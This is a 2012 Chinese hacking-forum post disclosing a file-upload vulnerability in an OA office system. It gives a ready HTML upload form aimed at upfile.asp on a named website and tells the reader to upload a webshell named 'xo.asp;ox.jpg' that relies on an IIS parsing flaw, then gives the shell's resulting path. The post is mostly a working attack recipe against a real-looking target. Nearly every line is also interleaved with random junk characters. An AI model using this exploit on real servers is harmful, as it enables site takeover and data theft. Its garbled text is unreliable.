找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2305|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
全能OA办公系统 上传漏洞1 q5 r' Y0 A/ X9 E: S- p

- j7 v! x2 C8 W系统介绍:
! X% c0 B0 R7 Y2 K# ~7 D5 s5 F; {9 W8 q! S; c8 |9 ~- T# |- A
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。( ^9 y$ H8 f5 |* c) z
0 ~! }' _- A. I3 u! z! e) a6 Q
主要功能:) P" b/ V6 {: r7 D9 E: K; F
公司通告 . L: J4 M- w0 b1 z0 y' A: i- S/ f! m% F
工作计划 7 T& V$ I* `- f
通讯助理
! ~* H! X: y! O  M; ?) c9 H客户资源 9 O+ `: z# m$ C# F! Y) `, @
我的公文
, ]3 k6 e  C* V3 B1 z公文传阅 + }  Y. g" p2 C% F# s. I' G
公共资源 5 @' [8 u, k. S; G' J
资源预约 + y: M: t# E# m. ^/ S& k
今日考勤 8 g: e/ u' U' I/ a. f( F& E
个人计划
# G* p) W8 a; J2 l个人通讯录
1 N4 k+ z$ b6 @个人基本档案 ; U1 b* z. K& {, k
未读邮件 , z7 M0 n& c, v8 _8 u
发邮件
. i7 [/ x. k5 ~) q0 e% q收件夹 ) T% I/ ]/ m; [1 g% O  V
寄件夹
- p  k& C- J6 u; Y( t8 }网络硬盘
6 [: r  A6 L4 z& U2 _# U6 I网络会议 4 d$ Z' M5 e/ C0 C, D
网络调查 : P" e; C6 l, q) ]0 Y* ]- w
交流论坛/ j" C$ e! Q, e( A" q* a
8 D. t3 P' A: s
有兴趣测试的朋友可以下源码看看. u( \6 G- U* o$ {# V. _
1 P+ N8 w3 C& M# B. H0 m
源码下载:
7 p1 @& M$ u9 r/ k& B" m* a: R1 y5 X9 u$ u
http://www.mycodes.net/30/4750.htm
* H- L" r- D$ V% u0 F% r* u9 G  e4 f: C+ E6 \1 M7 ^% h
漏洞介绍:
# X; H% |( ^, T  O
5 i( H; o' Y% E9 _6 z, B7 a$ g由upfile.asp上传文件漏洞引起
8 D6 Z0 ^  @% E  b$ n
1 L/ V/ N$ ?% f) t3 t测试方法:
! B4 _! B" A' U* \4 d, m* c  r
( ~0 m+ @( R# s' O3 Z! n( X4 \使用名小子上传http://www.itlynn.com/upfile.asp即可
. h7 I. x* e" Y( D
. }, S6 O: v% X4 ?  B& {如果upfile.asp文件被删除不存在。
* i5 p1 h7 N6 f1 \1 _8 j7 e7 g- e8 t! F( L2 X, `' V% a; K
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
( w' d8 c3 T2 G6 l% ~" G: ~% X1 `
如果存在那么将如下代码保存为upfile.html。9 _/ z' _+ |# ^& E' B
' b0 u8 u- G/ B2 J; a2 O. K' T
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp7 D7 E' N9 c6 H% ~% k! M! U
2 h9 _9 f  w  y7 h! s& p& t
( _% q; T# ?4 H

6 M+ P" R; X# m: e8 o+ I01 <table border='0' align="center" cellpadding="5">
( K2 M; \. g3 s0 s
9 R# [. T+ g1 Y! S- V02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
, g; ?1 x9 {& {) r# ?7 |; U+ R
' @$ a  {3 K; q03 <tr> . m! L, ~0 F- ~* g8 w/ J
9 v3 b; a8 W* @; _
04             <td>报错:</td> 8 g5 m/ n  m# M2 `. d

* V+ c% \9 T+ X: M- j9 }( ~05             <td><input type='radio' name='errnumber' value='0'>
  b9 [! e* x5 F: f0 F+ F' v* G0 t8 P
06               自动更名 ) q! ]  r! R% s3 T1 \6 ?

  X8 l( Y, ^7 y! u07               <input type='radio' name='errnumber' value='1' checked> # e: G: f7 _' L; P9 `
7 N9 ^2 C' u5 q0 U
08               报错方式
1 b" R- m: Z# ], }. R+ s$ L" L( M' r0 A) Z' Y' O
09               <input type='radio' name='errnumber' value='2'> ' h/ p8 Y. n9 }* ^2 F, e1 D

" P! o: x# _+ n% E1 }/ ]& \10               直接覆盖</td>
! I) @0 X- k8 [4 I) P: P1 N. q5 n/ w# x9 [6 A
11           </tr>
; `. o/ b6 v6 }/ k7 c0 R& K8 N
4 ?: f8 ]* }9 N! f12           <tr> 7 T1 H5 I2 N- q8 @; [& t
& e5 G+ m# w/ ]/ x% z+ u
13             <td>主题:</td>
' y5 f* |" Y3 S  \! s. x0 t" I0 Q' J# ]( j
14             <td><input type='text' name='filename' size='30'></td> 1 `$ W& ~) N3 \! N3 S) q
; L2 S5 [) u) s
15           </tr> ; t7 u8 h$ x  M8 q% z5 ~

% M  f# B" ^7 S! n2 R0 u16           <tr> 8 }% s5 s2 S: J
+ p' g/ |+ l; j& q/ K
17             <td>文件:</td>
7 _" m: u3 S, R. z+ \6 m) c/ T8 e% Z3 S0 c" {: S
18             <td><input type="file"name="fruit"size="30"></td> ! k, O; H2 _2 {

8 @5 Y; [# i3 b. m19           </tr> ! a- b) y" C" U2 h. n

" V8 I; n6 \/ I20           <tr> 1 ^/ K+ G% h% Y$ V6 [: \6 ~

$ t; ^. z% H4 D$ ]5 N6 t21             <td valign='top'>简介:</td>
% W0 Y- D9 @) H# I! `8 j4 z$ q
8 U& f4 G6 k& T! W) @# @  ]22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
: R# R+ q" [' W/ s: g8 a* `2 @# l' d7 I7 d3 j2 V# ^3 N; i2 r! ?+ f
23           </tr> 9 w. P$ [, v# \  n) x- i

6 R7 I  c5 w" |. e5 K& f; [& h24   2 z5 @) {5 ]- ]" W. p  ]; P. _

% E  G; C- q1 l# h3 J! E25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 5 i- O! G0 m" j6 m$ f

% a* J$ w! X5 V26           </tr> : p2 I; a8 J/ n! ?" W8 `0 @, D
# O9 V, @$ R9 i5 p
27         </form>   T) @' N  J7 ]& U# R1 _
, r; P, u+ i8 K3 ?4 w2 s! C
然后打开上传一个文件名为xo.asp;ox.jpg的文件。' s& I( L4 n2 s' g6 t9 `

* z' o: J7 G3 i9 b7 t& S 6 ], A/ F6 l) H4 P) I
: g( _% q* ?# Y
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg# H$ m5 Z3 w% `( @0 @
* m. G' i$ X; S: h9 |  Z7 I* [
此漏洞需要配合解析漏洞利用。
& a' i- A# L2 H0 T4 q7 ?4 d1 U- }2 O$ L8 y8 |: L2 t$ O1 l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表